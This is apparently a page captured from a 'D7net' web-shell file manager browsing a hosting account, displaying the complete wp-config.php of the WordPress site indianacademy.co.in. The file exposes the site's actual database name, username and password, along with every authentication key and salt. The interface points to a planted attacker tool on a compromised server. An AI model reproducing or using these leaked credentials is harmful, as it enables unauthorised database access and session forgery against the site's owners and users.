D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
etb1lp46s9ed
/
public_html
/
indianacademy.co.in
/
Filename :
wp-config.php
back
Copy
<?php define('WP_CACHE', true); // Added by SpeedyCache /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'indianac_wp572' ); /** Database username */ define( 'DB_USER', 'indianac_wp572' ); /** Database password */ define( 'DB_PASSWORD', '2SIga(p32]' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'nnxftv3pto2apyfo4golknjyz2vz3nrn5ik5ei2jgvtevrxfrzguyigajtnuwgrh' ); define( 'SECURE_AUTH_KEY', 'j24g77iv9yxfaikw7jmfqt7ucf80g6woolgz8gbhfmh0jfb0jytlrk9mn2yybp0k' ); define( 'LOGGED_IN_KEY', 'xecklkpzrq3hrmo5tr8ynblvxju7utsuonqzgzefwcmz2lowg4tjchisevcw10mv' ); define( 'NONCE_KEY', 'jxfidwjb5qdvkhuj0rl3kj2v1ettjcmaba0g6yiqkjnxlr2boylma3akvd3uq3tw' ); define( 'AUTH_SALT', 'jsjmltkyirlugruqqbprtdxxbfzp3d61v3gtu2zodqzeslfdczkqdgrpgkwje54z' ); define( 'SECURE_AUTH_SALT', 'v1xytlobheslt2i5wkd4xeebzxnhhokzsuuqce3wysjocjy30iquwmczqr7eiwv2' ); define( 'LOGGED_IN_SALT', '3dhktk7m3tmizdiywrunnymrnbvtwkysge3oh0g9md0vdq5pw0lqgcusc3ogr0qh' ); define( 'NONCE_SALT', 'qvndealyhd7g24ho7rjyqvl8pl3comjvtm3gcjsy1ec5ze7psqd8tyfcwmpmia2w' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wphd_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';